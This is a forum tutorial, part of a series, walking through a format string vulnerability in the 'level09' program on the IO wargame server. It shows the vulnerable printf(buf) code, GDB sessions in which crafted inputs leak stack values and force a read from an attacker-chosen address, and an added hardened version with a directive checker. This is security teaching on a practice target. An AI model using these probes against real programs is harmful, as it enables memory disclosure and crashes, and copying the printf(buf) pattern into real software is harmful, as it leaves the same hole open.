
lionaneesh 21Feb2011 17:52

Understanding Format Strings and Their Vulnerabilities - Part 2
 
This is a continuation of my previous article on format string vulnerabilities. I suggest a glance over it before reading further.

In this tutorial we'll see how to display the string (data) stored at a particular address.

We'll be using the IO hacking challenge machine for testing our vulnerability.

Code:

______  _____
/\__  _\ /\  __`\
\/_/\ \/ \ \ \/\ \      Levels are in /levels
  \ \ \  \ \ \ \ \    Passes are in ~/.pass
    \_\ \__\ \ \_\ \
    /\_____\\ \_____\  Server admin: beach (beach@smashthestack.org)
    \/_____/ \/_____/  Server janitor: bla

        1. No DoS, local or otherwise
        2. Do not try to connect to remote systems from this box
        3. Only two connections per IP are allowed
        4. Quotas are in place so don't waste resources
        5. This rules list is not all inclusive and is subject to change
        6. Have fuN++

                                (28 levels)

- use long(>5char) names in /tmp, short stuff is periodically deleted, as are
easily guessable ones
- o and feel free to leave your email in /home/email.list (it's writeonly)

-  Thanks everybody for the new translations!

level9@io:~$

Exploiting



Let's first take a look at the vulnerable program :-

Code:

#include <stdio.h>
#include <string.h>

int main(int argc, char **argv) {
        int  pad = 0xbabe;
        char buf[1024];
        /* argv[1] is copied in without checking argc, and strncpy writes
           no terminating NUL when the argument fills all 1023 bytes */
        strncpy(buf, argv[1], sizeof(buf) - 1);

        /* the bug: user data is passed as the format string, so every %x
           or %s in argv[1] is interpreted; printf("%s", buf) would not be */
        printf(buf);

        return 0;
}

Running :-

Code:

level9@io:/levels$ ./level09 Hey
Heylevel9@io:/levels$

Yeah, it's running fine. Now let's test it with some malicious input.

Code:

bfffde96 3ff bfffd910level9@io:/levels$ ./level09 "%x %x %x "
bfffde95 3ff bfffd910 level9@io:/levels$

Yeah... that is proof that it's vulnerable. We just popped some addresses off the stack.

Now let's fire up GDB and see what's happening :-

Code:

level9@io:/levels$ gdb ./level09
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
(gdb)

Let's add a breakpoint at the start of the program :-

Code:

(gdb) break main
Breakpoint 1 at 0x80483ad
(gdb)

Let's run it now

Code:

(gdb) run "%x %x"
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /levels/level09 "%x %x"

Breakpoint 1, 0x080483ad in main ()
(gdb)

Let's run it with some malicious input and see what's happening

Code:

(gdb) run "AAAA%x%x%x%x%x%x%x%x"
Starting program: /levels/level09 "AAAA%x%x%x%x%x%x%x%x"

Breakpoint 1, 0x080483ad in main ()
(gdb) continue
Continuing.
AAAAbfffde813ffbfffd9004141414178257825782578257825782578257825
Program exited normally.

Wow!! That's interesting... we got 41414141 in the middle.

Now let's reduce the pops (%x) so that AAAA is at the top of the stack, i.e. the next word printf reads, and we can read from it!!

Code:

(gdb) run "AAAA%x%x%x"
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /levels/level09 "AAAA%x%x%x"

Breakpoint 1, 0x080483ad in main ()
(gdb) continue
Continuing.
AAAAbfffde8b3ffbfffd900
Program exited normally.
(gdb)

OK, that looks great.
Let's now try to read from it.

Code:

(gdb) run "AAAA%x%x%x%s"
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /levels/level09 "AAAA%x%x%x%s"

Breakpoint 1, 0x080483ad in main ()
(gdb) continue
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x0019070b in strlen () from /lib/libc.so.6

0x41414141 ???
(gdb)

Wow!! Boom...
And we did it. We made the program read from a memory address, i.e. 0x41414141; it failed because that memory address doesn't exist in the process.

That's all for this article. Stay tuned for more.
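As an added example that is not code from the article or from the io level09 binary, here is the hardened form of the page's printf(buf) next to a small check for the same probe string. echo_fixed() passes the user data as an argument to a constant "%s" format, so the "%x" and "%s" inside it are copied rather than interpreted; scan_directives() is a hypothetical helper that counts the conversions printf would otherwise act on, the kind of check a reviewer or input filter would apply before untrusted data reaches a format function.

```c
/* Added example, not part of the original article or the level09 code.
 * scan_directives() and echo_fixed() are names chosen here. */
#include <stdio.h>
#include <string.h>

/* Count the conversions printf would interpret in s; "%%" is a literal '%'. */
size_t scan_directives(const char *s) {
    size_t n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }   /* "%%" prints one '%' */
        n++;                                  /* %x, %s, ... would consume an argument */
    }
    return n;
}

/* Hardened replacement for printf(buf): constant format, data as argument.
 * Also bounds and NUL-terminates the copy that the page's strncpy left
 * unterminated for a 1023-byte argument. Returns what snprintf reports. */
int echo_fixed(char *out, size_t outlen, const char *user) {
    return snprintf(out, outlen, "%s", user);
}

/* Compare the two behaviours on the page's probe string. Building with
 *   gcc -Wall -Wformat -Wformat-security demo.c
 * makes gcc warn about a printf() whose format is not a string literal. */
int main(void) {
    const char *probe = "AAAA%x%x%x%s";   /* constructed input, as on the page */
    char out[64];

    printf("directives printf would act on: %zu\n", scan_directives(probe));
    echo_fixed(out, sizeof out, probe);
    printf("echo_fixed output: %s\n", out); /* the probe, printed verbatim */
    return 0;
}
```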

lionaneesh 22Feb2011 12:29

Re: Understanding Format Strings and Their Vulnerabilities - Part 2
 
Thanks for accepting.
And I hope viewers could get something out of this!!

